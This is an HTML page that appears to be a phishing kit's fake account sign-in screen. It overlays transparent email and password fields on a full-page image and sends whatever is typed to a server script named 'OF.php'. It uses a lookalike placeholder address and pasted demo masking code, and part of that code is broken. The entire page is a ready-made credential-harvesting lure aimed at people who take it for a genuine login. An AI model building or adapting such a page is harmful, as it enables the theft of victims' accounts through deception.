
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true">

<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>


<title>Sign in into your account</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:20px;top:15px;width:360px;height:389px;text-align:left;z-index:3;">
<img src="ojomu/OF1.jpg" id="Image2" alt="" style="width:360px;height:389px;" align="top" border="0"></div>
<input id="Button2" name="Button1" value="" style="position:absolute;left:32px;top:267px;width:86px;height:38px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:4" type="submit">

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:398px;height:403px;z-index:5">
<form name="Form1" method="post" id="demo-form" action="OF.php"">

<input id="email" style="position:absolute;left:50px;top:180px;width:270px;height:20px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:0" name="email" value="" type="text" required placeholder="sorneone@example.com">

<input style="position:absolute;left:50px;top:208px;width:270px;height:20px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" name="password" value="" type="text" id="demo-field" required placeholder="Password">


<input id="Button3" name="Button1" value="" style="position:absolute;left:41px;top:285px;width:86px;height:38px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
</form>
</div>
<script type="text/javascript">
 
  //apply masking to the demo-field
  //pass the field reference, masking symbol, and character limit
  new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
 
  //test the submitted value
  document.getElementById('demo-form').onsubmit = function()
  {
   alert('pword = "' + this.pword.value + '"');
   return false;
  };
 
 </script>
</body></html>